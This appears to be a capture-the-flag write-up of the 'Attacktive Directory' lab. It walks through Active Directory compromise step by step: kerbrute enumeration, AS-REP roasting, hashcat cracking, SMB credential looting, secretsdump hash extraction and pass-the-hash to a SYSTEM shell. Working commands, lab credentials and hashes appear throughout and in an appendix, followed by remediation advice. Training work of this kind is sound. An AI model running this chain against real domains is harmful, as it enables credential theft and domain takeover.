Target IP: 10.49.179.130
Domain: spookysec.local
Domain NetBIOS: THM-AD
Domain Controller: AttacktiveDirectory.spookysec.local
OS: Windows Server 2019 (Version 10.0.17763)
1. Reconnaissance & Service Enumeration
An initial Nmap scan revealed a fully featured Active Directory Domain Controller:
nmap -p- -sV -sC 10.49.179.130Key Services Identified:
| Port | Service | Details |
|---|---|---|
| 53 | DNS | BIND (version exposed via TCP) |
| 80 | HTTP | Microsoft IIS 10.0 |
| 88 | Kerberos | Windows Kerberos service |
| 135/139/445 | SMB/RPC | Active Directory, SMB shares, NetBIOS |
| 389/636 | LDAP/LDAPS | Domain: spookysec.local |
| 464 | kpasswd | Kerberos password change |
| 3389 | RDP | Windows Terminal Services |
| 5985 | WinRM | HTTPAPI 2.0 |
| 9389 | .NET Message Framing | AD Web Services |
LDAP Enumeration Confirms Domain Structure:
nmap -p 389 --script ldap-rootdse 10.49.179.130- DNS Domain:
DC=spookysec,DC=local - DC Hostname:
AttacktiveDirectory.spookysec.local - Kerberos Realm:
SPOOKYSEC.LOCAL - NetBIOS Domain:
THM-AD(from RDP NLA banner)
Insight: The environment uses a DNS domain (
spookysec.local) distinct from its NetBIOS name (THM-AD)—a common configuration in modern AD deployments.
2. User Enumeration via Kerbrute
A custom user list was tested using kerbrute against the Kerberos service (port 88):
./kerbrute_linux_amd64 userenum --domain spookysec.local --dc 10.49.179.130 ./userlist.txtValid Accounts Identified:
administratorsvc-adminbackupjames,robin,darkstar,paradox,ori, etc.
Total: 16 valid domain accounts discovered.
3. Exploitation: AS-REP Roasting
The GetNPUsers.py script was used to target accounts without Kerberos pre-authentication:
python /opt/impacket/examples/GetNPUsers.py -no-pass -usersfile shortlisted-users.txt spookysec.local/Result:
- The
svc-adminaccount was vulnerable. - TGT hash captured in
$krb5asrep$23$format.
Cracking with Hashcat:
hashcat -m 18200 hash.txt passwordlist.txtPlaintext Password Recovered:
management2005
Note: This demonstrates weak password policy and misconfigured account security settings.
4. Credential Reuse & Share Enumeration
Using the svc-admin:management2005 credentials, SMB shares were enumerated:
smbclient -L //10.49.179.130 -U svc-adminExposed Shares:
ADMIN$,C$,NETLOGON,SYSVOL- Custom share:
backup
Accessing the backup Share:
smbclient //10.49.179.130/backup -U svc-adminA file backup_credentials.txt was found and downloaded.
Decoding the File:
The file contained a Base64-encoded string:
WW1GamEzVndRSE53YjI5cmVYTmxZeTVzYjJOaGJEcGlZV05yZFhBeU5URTNPRFl3
Decoded via CyberChef:
backup@spookysec.local:backup2517860
Critical Finding: Credentials for a second service account (
backup) were stored in plaintext on an SMB share accessible tosvc-admin.
5. Domain Hash Extraction
Using the backup:backup2517860 credentials, domain hash dumping was performed:
python /opt/impacket/examples/secretsdump.py -just-dc-ntlm -dc-ip 10.49.179.130 backup:backup2517860@10.49.179.130Key Hashes Obtained:
| Account | RID | NTLM Hash |
|---|---|---|
| Administrator | 500 | 0e0363213e37b94221497260b0bcb4fc |
| krbtgt | 502 | 0e2eb8158c27bed09861033026be4c21 |
| svc-admin | 1114 | fc0f1e5359e372aa1f69147375ba6809 |
| backup | 1118 | 19741bde08e135f4b40f1ca9aab45538 |
Full domain compromise achieved: All user NTLM hashes extracted from
NTDS.dit.
6. Privilege Escalation: Pass-the-Hash
The Administrator NTLM hash was used to gain a SYSTEM-level shell via psexec.py:
python /opt/impacket/examples/psexec.py -hashes :0e0363213e37b94221497260b0bcb4fc spookysec.local/Administrator@10.49.179.130Result:
C:\Windows\system32> whoami
nt authority\systemFull control over the Domain Controller.
7. Attack Path Summary
- Recon: Nmap identified AD services.
- Enumeration:
kerbrutediscovered valid users. - Exploitation: AS-REP roasting compromised
svc-admin. - Lateral Movement:
svc-adminaccessedbackupshare. - Credential Exposure: Base64-decoded backup credentials.
- Domain Dump:
backupaccount had DRSUAPI replication rights. - Escalation: Pass-the-Hash → SYSTEM shell.
8. Remediation Recommendations
-
Enforce Kerberos Pre-Authentication
→ DisableUF_DONT_REQUIRE_PREAUTHon all accounts. -
Secure Service Accounts
→ Do not store credentials in plaintext on network shares. -
Least Privilege for Service Accounts
→backupshould not have domain dump privileges (i.e., be a member of Domain Admins or equivalent). -
Enable SMB Signing
→ Prevents NTLM relay attacks (already enforced here, but verify universally). -
Monitor for AS-REP Roasting
→ Alert on TGT requests for accounts without pre-auth. -
Rotate krbtgt Password Twice
→ Invalidates Golden Ticket potential after compromise.
Appendix: Key Commands
# User enum
./kerbrute_linux_amd64 userenum --domain spookysec.local --dc 10.49.179.130 userlist.txt
# AS-REP roast
python GetNPUsers.py -no-pass -usersfile users.txt spookysec.local/
# Crack
hashcat -m 18200 hash.txt passwordlist.txt
# SMB access
smbclient //10.49.179.130/backup -U svc-admin
# Decode creds
echo "WW1GamEzVndRSE53YjI5cmVYTmxZeTVzYjJOaGJEcGlZV05yZFhBeU5URTNPRFl3" | base64 -d
# Dump hashes
python secretsdump.py -just-dc-ntlm backup:backup2517860@10.49.179.130
# Get shell
python psexec.py -hashes :0e0363213e37b94221497260b0bcb4fc Administrator@10.49.179.130